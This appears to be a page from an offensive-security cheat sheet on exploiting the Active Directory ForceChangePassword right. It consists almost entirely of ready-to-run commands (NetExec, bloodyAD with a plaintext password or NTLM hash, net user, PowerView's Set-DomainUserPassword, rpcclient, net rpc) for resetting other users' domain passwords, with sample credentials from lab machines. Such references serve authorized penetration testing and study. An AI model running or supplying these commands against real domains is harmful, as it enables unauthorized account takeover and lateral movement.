ForceChangePassword

Exploitation

nxc smb <target> -u <user> -p <pass> -M change-password -o USER=blake NEWPASS=Password123!

# Plaintext credentials
bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb set password winrm_svc 'Password123!'

# NTLM hash
bloodyAD --host 172.16.1.15 -d bloody.local -u jane.doe -p :70016778cb0524c799ac25b439bd6a31 set password <target-user> <pass>

net user <user> <pass> /domain

# Create a PSCredential object for the current user
$SecPassword = ConvertTo-SecureString 'transporter@4' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $SecPassword)

# Set the password for the target user
$damundsenPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force

# Import powerview
Import-Module .\PowerView.ps1

# Change the user's password
Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword -Credential $Cred -Verbose

rpcclient -U <USER> <IP>
> setuserinfo2 <USER> 23 'ComplexP4ssw0rd!'
# OR
> chgpasswd3 <USER> <OLDPASS> <NEWPASS>

net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"

Resources

Edges — BloodHound 4.2.0 documentation

PreviousDCSync NextFullControl

Last updated 1 month ago

Was this helpful?